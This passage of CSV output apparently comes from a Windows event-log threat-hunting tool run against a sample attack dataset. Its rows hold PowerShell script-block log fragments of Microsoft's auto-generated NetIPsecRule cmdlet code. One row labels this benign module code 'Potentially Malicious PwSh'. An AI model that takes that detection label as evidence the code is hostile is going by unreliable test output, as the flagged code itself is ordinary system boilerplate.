$__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') 
-and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and 
(@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 
'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Servers')) { [object]$__cmdletization_value = ${Servers} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Servers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Servers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Domains')) { [object]$__cmdletization_value = ${Domains} 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Domains'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Domains'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EndpointType')) { [object]$__cmdletization_value = ${EndpointType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AddressType')) { [object]$__cmdletization_value = ${AddressType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AddressType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.AddressVersion'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AddressType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.AddressVersion'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Output'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DnsServers')) { [object]$__cmdletization_value = ${DnsServers} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DnsServers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DnsServers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('SyncPolicyDelta', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $false if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Sync-NetIPsecRule' -Alias '*' function Update-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])] param( [Parameter(ParameterSetName='Query (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)', Mandatory=$true, 
ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.ChangeAction] ${Action}, [Parameter(ParameterSetName='Query (cdxml)', ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', ValueFromPipelineByPropertyName=$true)] [string[]] ${IPv6Addresses}, [Parameter(ParameterSetName='Query (cdxml)', ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', ValueFromPipelineByPropertyName=$true)] [string[]] ${IPv4Addresses}, [Parameter(ParameterSetName='Query (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType] ${EndpointType}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { 
$__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Action')) { [object]$__cmdletization_value = ${Action} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.ChangeAction'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Action'; ParameterType = 
'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.ChangeAction'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IPv6Addresses')) { [object]$__cmdletization_value = ${IPv6Addresses} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IPv6Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IPv6Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IPv4Addresses')) { [object]$__cmdletization_value = ${IPv4Addresses} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IPv4Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IPv4Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EndpointType')) { [object]$__cmdletization_value = 
${EndpointType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PassThru')) { [object]$__cmdletization_value = ${PassThru} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PassThru'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PassThru'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Output'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue 
= [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('SetPolicyDelta', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $false if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Update-NetIPsecRule' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DnsServers')) { [object]$__cmdletization_value = ${DnsServers} $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DnsServers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DnsServers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('SyncPolicyDelta', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $false if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Sync-NetIPsecRule' -Alias '*' function Update-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])] param( [Parameter(ParameterSetName='Query (cdxml)', Mandatory=$true, 
ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.ChangeAction] ${Action}, [Parameter(ParameterSetName='Query (cdxml)', ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', ValueFromPipelineByPropertyName=$true)] [string[]] ${IPv6Addresses}, [Parameter(ParameterSetName='Query (cdxml)', ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', ValueFromPipelineByPropertyName=$true)] [string[]] ${IPv4Addresses}, [Parameter(ParameterSetName='Query (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType] ${EndpointType}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject 
(cdxml)')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { 